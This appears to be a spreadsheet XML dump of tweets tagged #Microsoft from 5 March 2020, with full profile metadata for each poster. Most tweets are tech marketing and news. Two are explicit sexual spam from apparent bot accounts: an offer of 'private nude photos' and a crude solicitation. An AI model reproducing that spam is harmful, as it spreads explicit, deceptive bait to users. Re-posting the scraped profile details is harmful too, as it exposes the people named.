    <t>{'id': 763820100, 'id_str': '763820100', 'name': 'MSBISF', 'screen_name': 'MSBISF', 'location': 'South Florida', 'description': '', 'url': 'https://t.co/fxsTZHZ6iB', 'entities': {'url': {'urls': [{'url': 'https://t.co/fxsTZHZ6iB', 'expanded_url': 'https://bitly.com/2qgCUbM', 'display_url': 'bitly.com/2qgCUbM', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 150, 'friends_count': 79, 'listed_count': 11, 'created_at': 'Fri Aug 17 14:32:27 +0000 2012', 'favourites_count': 226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 216,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'http://pbs.twimg.com/profile_images/3029644014/48fe041371f86343f6947b288d7b0abd_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3029644014/48fe041371f86343f6947b288d7b0abd_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/763820100/1356637759',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</si>
  <si>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19:33:20 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info Minecraft Festival is postponed due to coronavirus fears https://t.co/52Rs5UQdYw</t>
  </si>
  <si>
    <t>{'id': 1144975383927885825, 'id_str': '1144975383927885825', 'name': 'Future Proof', 'screen_name': 'FutureProofN', 'location': 'Colorado Springs, CO', 'description': 'Get the best news in smart devices, gadgets and other cool stuff coming to us! Follow us for great discounts and RT', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 242, 'friends_count': 243, 'listed_count': 3, 'created_at': 'Sat Jun 29 14:26:18 +0000 2019', 'favourites_count': 2443, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3771,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'http://pbs.twimg.com/profile_images/1145018693438627840/BbLC9VdP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145018693438627840/BbLC9VdP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1144975383927885825/1561819199',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</si>
  <si>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19:33:02 +0000 2020</t>
  </si>
  <si>
    <t>Great conversations all around.  #PowerOf3 #SAP #Microsoft #Accenture #Azure https://t.co/lZmKoqtqLR</t>
  </si>
  <si>
    <t>{'id': 90814608, 'id_str': '90814608', 'name': 'Francois Pienaar', 'screen_name': 'fhpienaar', 'location': 'Sandton, South Africa', 'description': "Our rainbow nation is so complex, please respect each other's views as we all come from very different backgrounds. These views are my own.", 'url': 'https://t.co/tBEQ3QwCxD', 'entities': {'url': {'urls': [{'url': 'https://t.co/tBEQ3QwCxD', 'expanded_url': 'http://fhpienaar.wordpress.com', 'display_url': 'fhpienaar.wordpress.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1794, 'friends_count': 1146, 'listed_count': 256, 'created_at': 'Wed Nov 18 06:17:26 +0000 2009', 'favourites_count': 7933, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 47869,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'http://pbs.twimg.com/profile_images/1173872950342238208/sptaak6j_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1173872950342238208/sptaak6j_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/90814608/1531815638', 'profile_link_color': '19CF86',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</si>
  <si>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19:32:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft provides annual update on its Airband Initiative #microsoft #airband https://t.co/VxbHDtNmcV https://t.co/9SpKRqoVPZ</t>
  </si>
  <si>
    <t>Thu Mar 05 19:31:49 +0000 2020</t>
  </si>
  <si>
    <t>One of the biggest challenges when migrating large data sets is optimizing the integration to run as fast as possible. Check out our latest blog to learn more about scaling your data with Microsoft Azure Data Factory. #btgrocks #microsoft #azure
https://t.co/B7mxHMKYI0</t>
  </si>
  <si>
    <t>{'id': 196164121, 'id_str': '196164121', 'name': 'Beringer Tech Group', 'screen_name': 'BeringerTechGrp', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 114, 'listed_count': 1, 'created_at': 'Tue Sep 28 13:53:28 +0000 2010', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 183,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'http://pbs.twimg.com/profile_images/808788694253629444/ZqzEX3v8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/808788694253629444/ZqzEX3v8_normal.jpg',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</si>
  <si>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19:31:08 +0000 2020</t>
  </si>
  <si>
    <t>Fantastic insight into the #Microsoft #DPIA process from Steve May, the Microsoft DPO at tonights #KnowledgeNet. Love the discussion on group dependencies and follow up required post DPIA. https://t.co/pfdDcyZnQt</t>
  </si>
  <si>
    <t>{'id': 193227776, 'id_str': '193227776', 'name': 'Kate Colleary', 'screen_name': 'KateColleary', 'location': 'Dublin City, Ireland', 'description': 'Privacy Pro, Data Protection, litigation and IP lawyer. Irish IAPP Country Leader for @privacypros ; Director @pembrokeprivacy Principal @collearyandco.', 'url': 'https://t.co/Ws143LRuzH', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ws143LRuzH', 'expanded_url': 'http://www.pembrokeprivacy.com', 'display_url': 'pembrokeprivacy.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1381, 'friends_count': 1001, 'listed_count': 60, 'created_at': 'Tue Sep 21 09:13:08 +0000 2010', 'favourites_count': 5055, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4642,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'http://pbs.twimg.com/profile_images/1018258585833410560/3lM8sEkM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1018258585833410560/3lM8sEkM_normal.jpg',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</si>
  <si>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19:31:01 +0000 2020</t>
  </si>
  <si>
    <t>Investors agree #microsoft #azure is nowhere near its ceiling as it claws away market share from #amazon #aws https://t.co/hpbjjyREwf</t>
  </si>
  <si>
    <t>{'id': 805447353683574784, 'id_str': '805447353683574784', 'name': 'Benjamin W Thomas', 'screen_name': 'benjaminwthomas', 'location': 'New York, USA', 'description': 'Manager | Cloud Advisory | Technology Consulting | Accenture', 'url': 'https://t.co/mdgiwYn20W', 'entities': {'url': {'urls': [{'url': 'https://t.co/mdgiwYn20W', 'expanded_url': 'http://benjaminwesleythomas.com', 'display_url': 'benjaminwesleythomas.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 321, 'friends_count': 345, 'listed_count': 5, 'created_at': 'Sun Dec 04 16:23:08 +0000 2016', 'favourites_count': 2216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1104,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'http://pbs.twimg.com/profile_images/970394791090405376/eu912RpI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/970394791090405376/eu912RpI_normal.jpg',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</si>
  <si>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19:30:43 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #Azure     VIA @azure     How to use Azure Ultra Disks with Azure Virtual Machines  https://t.co/Y0G13Ip4XH</t>
  </si>
  <si>
    <t>Thu Mar 05 19:30:30 +0000 2020</t>
  </si>
  <si>
    <t>I am streaming Dead by Daylight come stop by to my Channel and support me please. #mixerstreamersunite #SmallStreamersConnect #mixercommunity #Mixer #DeadbyDaylight #XboxOne #Microsoft https://t.co/Lzu5t8vcrA</t>
  </si>
  <si>
    <t>{'id': 311111674, 'id_str': '311111674', 'name': 'Jahvaun Thomas', 'screen_name': 'Xadrenaline96X', 'location': 'Bronx, NY', 'description': 'ðŸ“·Photographer. God Come 1st.\n23 yr old Man who love to Play games. \nXBOX: XADRENALINE96X\n Check out my channel https://t.co/pAzEiEx4Yu', 'url': 'https://t.co/pAzEiEx4Yu', 'entities': {'url': {'urls': [{'url': 'https://t.co/pAzEiEx4Yu', 'expanded_url': 'http://Mixer.com/XADRENALINE96X', 'display_url': 'Mixer.com/XADRENALINE96X', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/pAzEiEx4Yu', 'expanded_url': 'http://Mixer.com/XADRENALINE96X', 'display_url': 'Mixer.com/XADRENALINE96X', 'indices': [111, 134]}]}}, 'protected': False, 'followers_count': 338, 'friends_count': 386, 'listed_count': 1, 'created_at': 'Sat Jun 04 22:33:59 +0000 2011', 'favourites_count': 1103, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1192329470448984064/QA2By3CB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1192329470448984064/QA2By3CB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/311111674/1574908733', 'profile_link_color': '89C9FA',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</si>
  <si>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19:30:06 +0000 2020</t>
  </si>
  <si>
    <t>Ready to take your #security posture to the next level in 2020? 
@Microsoft365 is the next step in ensuring your #Office365 investment has the end-to-end protection your company needs.
Learn how to get secure using #Microsoft 365: https://t.co/OXNOb4z6Vs https://t.co/hub0fxGAzV</t>
  </si>
  <si>
    <t>{'id': 19025181, 'id_str': '19025181', 'name': 'Core BTS, Inc.', 'screen_name': 'CoreBTS', 'location': 'Madison, WI', 'description': 'Customer-centric technology consulting organization dedicated to transforming IT experiences and delivering value to its clients.', 'url': 'http://t.co/0hKgwRU7Wt', 'entities': {'url': {'urls': [{'url': 'http://t.co/0hKgwRU7Wt', 'expanded_url': 'http://www.corebts.com', 'display_url': 'corebts.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 959, 'friends_count': 409, 'listed_count': 51, 'created_at': 'Thu Jan 15 15:25:11 +0000 2009', 'favourites_count': 936, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2703, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EFF7F7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/759121247867371520/pg4lFq8q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/759121247867371520/pg4lFq8q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19025181/1576101222', 'profile_link_color': '5DB418',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</si>
  <si>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Thu Mar 05 19:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Access user? We now have training dates available for the Office 365 versions of Access. Learn more here: https://t.co/HIHwJQ42cg #Microsoft #Access #ITTraining https://t.co/aB4xC5iKdY</t>
  </si>
  <si>
    <t>{'id': 199689820, 'id_str': '199689820', 'name': 'NHLearning Solutions', 'screen_name': 'NewHorizonsLS', 'location': 'CT, MA, MI, IL, NH, NJ, NY, OH', 'description': 'NH Learning Solutions is an authorized training provider for #Microsoft #Cisco #Adobe #RedHat #Citrix #PMI #ITIL #CompTIA #SixSigma and more!', 'url': 'http://t.co/HkUB5DL15R', 'entities': {'url': {'urls': [{'url': 'http://t.co/HkUB5DL15R', 'expanded_url': 'http://www.nhlearningsolutions.com', 'display_url': 'nhlearningsolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4586, 'friends_count': 3540, 'listed_count': 123, 'created_at': 'Thu Oct 07 14:19:48 +0000 2010', 'favourites_count': 865, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6113, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DBE9ED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/471741221677723649/BxCucZt2_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/471741221677723649/BxCucZt2_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/199689820/1484324272', 'profile_link_color': '3B94D9',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</si>
  <si>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Thu Mar 05 19:22:23 +0000 2020</t>
  </si>
  <si>
    <t>Known Issue: Skype Directory Search Service Connections May Fail if TLS 1.2 Is Not Enabled on Edge https://t.co/ENMgDaXe4L #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 19:22:12 +0000 2020</t>
  </si>
  <si>
    <t>Hey guys who want some private nude photos? #Oceanside   #microsoft #painting https://t.co/cCuj6Vkt6I</t>
  </si>
  <si>
    <t>{'id': 1235510545584881664, 'id_str': '1235510545584881664', 'name': 'Shakeeta Singleton', 'screen_name': 'sperarliran', 'location': 'Bridgeport, USA', 'description': 'Love Sayings That Will Touch Your Hearts', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Thu Mar 05 10:20:51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'http://pbs.twimg.com/profile_images/1235519760617689088/FWq11dgT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235519760617689088/FWq11dgT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235510545584881664/1583405904',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</si>
  <si>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19:19:12 +0000 2020</t>
  </si>
  <si>
    <t>We've partnered with EazyStock to bring inventory optimization to Microsoft Dynamics 365 Business Central! 
https://t.co/OEaff8c3Ap
#Microsoft #Inventory #optimization #MSDyn365bc #MSDyn365" https://t.co/ZTn9GQOmtA</t>
  </si>
  <si>
    <t>{'id': 1079128271118319616, 'id_str': '1079128271118319616', 'name': 'NavDrive', 'screen_name': 'DriveNav', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 63, 'friends_count': 0, 'listed_count': 2, 'created_at': 'Sat Dec 29 21:33:23 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15259, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1079128649188757505/1eie--Lr_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1079128649188757505/1eie--Lr_normal.png',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</si>
  <si>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19:18:20 +0000 2020</t>
  </si>
  <si>
    <t>3/ The most interesting thing about all this is *how* #Microsoft is making this all work, both business and technical. The shift in #revenue generation (to #XboxGamePass) should in theory take some pressure off the hardware sales, and allow them to iterate more often.</t>
  </si>
  <si>
    <t>{'id': 826896408708050944, 'id_str': '826896408708050944', 'name': 'Game Over Thirty', 'screen_name': 'GameOverThirty', 'location': 'Earth!', 'description': 'In-depth game industry discussion. Inquires &amp; requests go to joethreezero@gameoverthirty.com. YT - https://t.co/IPFbMxSlLK', 'url': 'https://t.co/SPHGDcG8Mc', 'entities': {'url': {'urls': [{'url': 'https://t.co/SPHGDcG8Mc', 'expanded_url': 'http://gameoverthirty.com', 'display_url': 'gameoverthirty.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/IPFbMxSlLK', 'expanded_url': 'https://www.youtube.com/channel/UCZpXq7DQkY2DQ96bP2g9fZg', 'display_url': 'youtube.com/channel/UCZpXqâ€¦', 'indices': [99, 122]}]}}, 'protected': False, 'followers_count': 175, 'friends_count': 174, 'listed_count': 2, 'created_at': 'Wed Feb 01 20:54:01 +0000 2017', 'favourites_count': 1038, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7165,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'http://pbs.twimg.com/profile_images/826896675792941057/kHzOmsqn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/826896675792941057/kHzOmsqn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/826896408708050944/1562359837', 'profile_link_color': '210DB4',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</si>
  <si>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19:18:19 +0000 2020</t>
  </si>
  <si>
    <t>2/ There could be any number of things going on to make the #XboxSeriesX 1) semi-affordable and 2) not something that is going to set the case on fire.  And don't forget, while #Microsoft could very well lose money on every console sold, they have to control that loss.</t>
  </si>
  <si>
    <t>1/ I give #Microsoft a virtual high-five for coming out of gate with GPU technology that *probably* hovers around the power of a #GTX2080. BUT...(and I hate repeating this)...we haven't seen any application of the hardware to an actual GAME. https://t.co/QDDnTrpL6Z</t>
  </si>
  <si>
    <t>Thu Mar 05 19:17:47 +0000 2020</t>
  </si>
  <si>
    <t>Researchers Find 670+ Microsoft Subdomains Vulnerable to Takeover https://t.co/STYJOriNS6 #microsoft</t>
  </si>
  <si>
    <t>{'id': 1018289618, 'id_str': '1018289618', 'name': 'SMLR Group, Inc.', 'screen_name': 'SMLRG', 'location': 'New York, NY', 'description': 'We are an organization specializing in bringing major companies together, allowing for the complete package of Compliance, Cyber Governance and Security.', 'url': 'http://t.co/MH03hBAu71', 'entities': {'url': {'urls': [{'url': 'http://t.co/MH03hBAu71', 'expanded_url': 'http://smlrgroup.com', 'display_url': 'smlrgroup.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1217, 'friends_count': 1480, 'listed_count': 642, 'created_at': 'Mon Dec 17 20:42:20 +0000 2012', 'favourites_count': 17, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 43733, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '030303', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000637238871/9ae3a3cc37f7876db3da9b23a2f71569_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000637238871/9ae3a3cc37f7876db3da9b23a2f71569_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1018289618/1415892188',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</si>
  <si>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19:17:44 +0000 2020</t>
  </si>
  <si>
    <t>If you want to fuck me in the ass, do a retweet #Pittsburgh   #microsoft #line https://t.co/dTZOBsh6L4</t>
  </si>
  <si>
    <t>{'id': 1235539935261798401, 'id_str': '1235539935261798401', 'name': 'Chelsea Torres', 'screen_name': 'duldabbgolfdi', 'location': 'Baltimore, USA', 'description': 'Your love is all I need to feel complete.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 32, 'listed_count': 0, 'created_at': 'Thu Mar 05 12:17:36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'http://pbs.twimg.com/profile_images/1235606043666919428/SxmML6z4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235606043666919428/SxmML6z4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235539935261798401/1583419765',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</si>
  <si>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19:17:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's Scott Guettinger explains how they're enabling partner go-to-market in the #IoT space. Find out more at the #HybridCloud Roadshow: https://t.co/bPv06Gslaq
#HPEalliances  #TechNativeTV https://t.co/li6PeIMQoe</t>
  </si>
  <si>
    <t>Thu Mar 05 19:15:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft understands the importance that its service offerings align with customer needs and shifting market conditions. We're committed to working with and providing top-of-the-line service to open source platforms. https://t.co/vWESa6HSiP @microsoft #opensource</t>
  </si>
  <si>
    <t>{'id': 2421652417, 'id_str': '2421652417', 'name': 'VIAcode', 'screen_name': 'VIAcodeDev', 'location': 'Redmond, WA', 'description': 'VIAcode offers Managed Services for Azure Clou. Follow us for news about IT management, monitoring, migration and cloud management trends!', 'url': 'http://t.co/bY9Z1GL81C', 'entities': {'url': {'urls': [{'url': 'http://t.co/bY9Z1GL81C', 'expanded_url': 'http://www.viacode.com', 'display_url': 'viacode.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 233, 'listed_count': 9, 'created_at': 'Tue Apr 01 06:23:07 +0000 2014', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1050,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'http://pbs.twimg.com/profile_images/1118610869754245120/PF5XtnrS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118610869754245120/PF5XtnrS_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2421652417/1555536623',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</si>
  <si>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19:14:11 +0000 2020</t>
  </si>
  <si>
    <t>Qualcomm to build Azure Sphere chips with Cellular connectivity
 #MCU #security #Microsoft
https://t.co/uCe5ZyxhCg</t>
  </si>
  <si>
    <t>Thu Mar 05 19:10:34 +0000 2020</t>
  </si>
  <si>
    <t>Over 600 Microsoft Subdomains Can Be Hijacked: Researchers | https://t.co/2lyUPQsfCq https://t.co/FJrEL5BhJO
#microsoft #cybersecuritynews #cybersec #cybersecurity #dontriskitsecureit</t>
  </si>
  <si>
    <t>{'id': 2830775725, 'id_str': '2830775725', 'name': '24By7Security', 'screen_name': '24By7Security', 'location': 'Coral Springs, FL', 'description': '24By7Security is a Cybersecurity strategy, implementation and Services- HIPAA, GLBA, FERPA, FIPA, Cyber security Assessments. #DontRiskITSecureIT', 'url': 'https://t.co/uf1ikPATxT', 'entities': {'url': {'urls': [{'url': 'https://t.co/uf1ikPATxT', 'expanded_url': 'https://linktr.ee/24by7security', 'display_url': 'linktr.ee/24by7security', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1931, 'friends_count': 1770, 'listed_count': 188, 'created_at': 'Thu Sep 25 00:13:15 +0000 2014', 'favourites_count': 10538, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14196,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'http://pbs.twimg.com/profile_images/575667030268870656/wTJ9UOtU_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/575667030268870656/wTJ9UOtU_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2830775725/1528676661',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</si>
  <si>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19:09:12 +0000 2020</t>
  </si>
  <si>
    <t>Rainbow Six Siege, Plants Vs. Zombies: Battle for Neighborville and Black Desert are free to play with #Xbox Live Gold this weekend 
https://t.co/vBrPDSlST8 #Microsoft #RAINBOWSIXSIEGE #XboxOne #XboxLive #InsideXbox #Gaming #XboxGamePass https://t.co/Q3TY3jTTVw</t>
  </si>
  <si>
    <t>Thu Mar 05 19:08:25 +0000 2020</t>
  </si>
  <si>
    <t>Minecraft Festival is postponed due to coronavirus fears https://t.co/qqBhPa9B80 #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 19:07:29 +0000 2020</t>
  </si>
  <si>
    <t>Our director, @KateColleary presented with the #Microsoft #DPO Steve May on DPO challenges at Microsofts @PrivacyPros #KnowledgeNet tonight.  Great discussion of a DEFCON style response to #DSARs and escalation processes! https://t.co/z8wOShsHnn</t>
  </si>
  <si>
    <t>{'id': 1090213966024974336, 'id_str': '1090213966024974336', 'name': 'Pembroke Privacy', 'screen_name': 'PembrokePrivacy', 'location': '', 'description': 'Pembroke Privacy is an innovative data protection and privacy consultancy providing practical commercially focused data protection compliance services.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 87, 'listed_count': 1, 'created_at': 'Tue Jan 29 11:43:59 +0000 2019', 'favourites_count': 41,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'http://pbs.twimg.com/profile_images/1090214313908989954/AfD-TQWi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1090214313908989954/AfD-TQWi_normal.jpg',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</si>
  <si>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19:06:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's solution for #COVID-19 is a free #Teams subscription for six months https://t.co/LcZo0BJjwF</t>
  </si>
  <si>
    <t>Thu Mar 05 19:05:17 +0000 2020</t>
  </si>
  <si>
    <t>Troubleshooting and resolving #Microsoft Intune NDES connector setup failure. #MSIntune #Windows10 #Windows #MDM #ConfigMgr #aovpn https://t.co/DcDN5xuOaA</t>
  </si>
  <si>
    <t>{'id': 17916197, 'id_str': '17916197', 'name': 'Richard Hicks', 'screen_name': 'richardhicks', 'location': 'Southern California', 'description': 'Enterprise #mobility &amp; #security infrastructure expert. #Microsoft Always On #VPN #aovpn, #DirectAccess, #PKI. #Seinfeld, #Angels #baseball, #craftbeer.', 'url': 'https://t.co/XsRm9xbkTR', 'entities': {'url': {'urls': [{'url': 'https://t.co/XsRm9xbkTR', 'expanded_url': 'https://directaccess.richardhicks.com/', 'display_url': 'directaccess.richardhicks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3378, 'friends_count': 2674, 'listed_count': 219, 'created_at': 'Sat Dec 06 04:12:50 +0000 2008', 'favourites_count': 9906, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 23142,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'http://pbs.twimg.com/profile_images/753374586616487936/OyWF8Q9J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/753374586616487936/OyWF8Q9J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17916197/1470057942', 'profile_link_color': '003366', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '999999', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 19:05:07 +0000 2020</t>
  </si>
  <si>
    <t>In case you missed it.... New blog post: Leveraging the New Office App -- a comparison of the standalone apps for Word, Excel, PowerPoint, OneDrive, and Office Lens https://t.co/PVksunOUSP #Microsoft #MicrosoftOffice #productivity #UX #MVPBuzz https://t.co/unbTm0uBR8</t>
  </si>
  <si>
    <t>{'id': 14838585, 'id_str': '14838585', 'name': 'Christian Buckley #CollabTalk', 'screen_name': 'buckleyplanet', 'location': 'Lehi, UT', 'description': 'CEO of @CollabTalk, #MVPbuzz #RDbuzz #AI #collaboration #productivity #blockchain #marketing #SharePoint #MicrosoftTeams #Office365 #CMO #MBA #Strategy #Zune', 'url': 'https://t.co/0aLIrrudvC', 'entities': {'url': {'urls': [{'url': 'https://t.co/0aLIrrudvC', 'expanded_url': 'https://www.buckleyplanet.com', 'display_url': 'buckleyplanet.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 23458, 'friends_count': 10426, 'listed_count': 944, 'created_at': 'Mon May 19 22:44:26 +0000 2008', 'favourites_count': 6161, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 40094, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2F577A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/927401850403303427/6mX22ARV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/927401850403303427/6mX22ARV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14838585/1553783188', 'profile_link_color': '2F577A', 'profile_sidebar_border_color': '1B1F22', 'profile_sidebar_fill_color': '1B1F22', 'profile_text_color': '074991', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 19:04:59 +0000 2020</t>
  </si>
  <si>
    <t>Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/Uy7VR5G3GO</t>
  </si>
  <si>
    <t>{'id': 1004263428, 'id_str': '1004263428', 'name': 'Wilkins IT Solutions', 'screen_name': 'WilkinsIT', 'location': 'Durham Region, Ontario', 'description': 'We offer a full range of tech products and services to help you focus on your business, saving you time and money.', 'url': 'https://t.co/XvAhwu3uEA', 'entities': {'url': {'urls': [{'url': 'https://t.co/XvAhwu3uEA', 'expanded_url': 'https://www.wilkinsit.ca', 'display_url': 'wilkinsit.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 145, 'friends_count': 62, 'listed_count': 126, 'created_at': 'Tue Dec 11 15:37:58 +0000 2012', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4572,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'http://pbs.twimg.com/profile_images/1197960064956534789/sy3MqxbH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197960064956534789/sy3MqxbH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1004263428/1574450912',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</si>
  <si>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19:04:48 +0000 2020</t>
  </si>
  <si>
    <t>Technology can save more lives, alleviate suffering and restore human dignity by changing the way frontline relief organizations anticipate, predict and better target response efforts. Subscribe to learn more about what #Microsoft can do for you! https://t.co/YepQBTtfTw</t>
  </si>
  <si>
